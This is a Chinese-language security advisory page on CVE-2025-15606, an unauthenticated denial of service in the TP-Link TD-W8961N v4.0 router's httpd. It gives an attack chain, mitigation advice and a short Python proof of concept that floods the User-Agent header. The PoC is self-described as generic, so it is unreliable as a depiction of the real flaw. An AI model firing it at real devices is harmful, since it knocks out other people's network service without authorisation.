CVE-2025-15606 CVSS 7.5 高危

CVE-2025-15606 TP-Link TD-W8961N 拒绝服务漏洞

披露日期: 2026-03-23

来源: f23511db-6c3e-4e32-a477-6aa17d310630

漏洞信息

漏洞编号

CVE-2025-15606

漏洞类型

拒绝服务 (DoS)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

TP-Link TD-W8961N

漏洞概述

TP-Link TD-W8961N v4.0版本的httpd组件存在拒绝服务漏洞。该漏洞源于对输入数据的清理不当，未经身份验证的远程攻击者可发送特制恶意请求，触发系统处理错误导致httpd服务崩溃，进而造成目标设备服务中断。

技术细节

该漏洞位于TP-Link TD-W8961N路由器的httpd服务中。由于httpd组件未能正确过滤或清理特定输入字段，攻击者可构造畸形的HTTP请求包通过网络发送至目标设备。当httpd尝试解析该恶意请求时，会触发逻辑错误或底层内存异常，导致httpd进程意外终止。此攻击无需用户交互和认证，利用难度低，但对服务可用性影响极高。

攻击链分析

STEP 1

步骤1

攻击者扫描网络，识别出TP-Link TD-W8961N v4.0设备。

STEP 2

步骤2

攻击者构造包含恶意输入数据的HTTP请求包。

STEP 3

步骤3

向目标设备的httpd端口发送特制请求。

STEP 4

步骤4

目标设备httpd服务在处理请求时崩溃，导致服务中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (replace with actual IP)
target_url = "http://192.168.1.1/"

# Generate a long string to test input sanitization
# This is a generic PoC pattern for DoS via improper input handling
payload = "A" * 10000 

headers = {
    "User-Agent": payload,  # Testing header overflow/sanitization
    "Content-Type": "application/x-www-form-urlencoded"
}

try:
    print(f"Sending malicious request to {target_url}...")
    response = requests.get(target_url, headers=headers, timeout=5)
    print(f"Request sent. Status code: {response.status_code}")
    print("Check if the device web interface is still responsive.")
except Exception as e:
    print(f"An exception occurred (Service might be down): {e}")

影响范围

TP-Link TD-W8961N v4.0

防御指南

临时缓解措施

如果无法立即升级固件，建议通过防火墙规则限制外部网络对路由器管理端口的访问，仅允许可信的内网IP地址进行连接，以降低被攻击的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表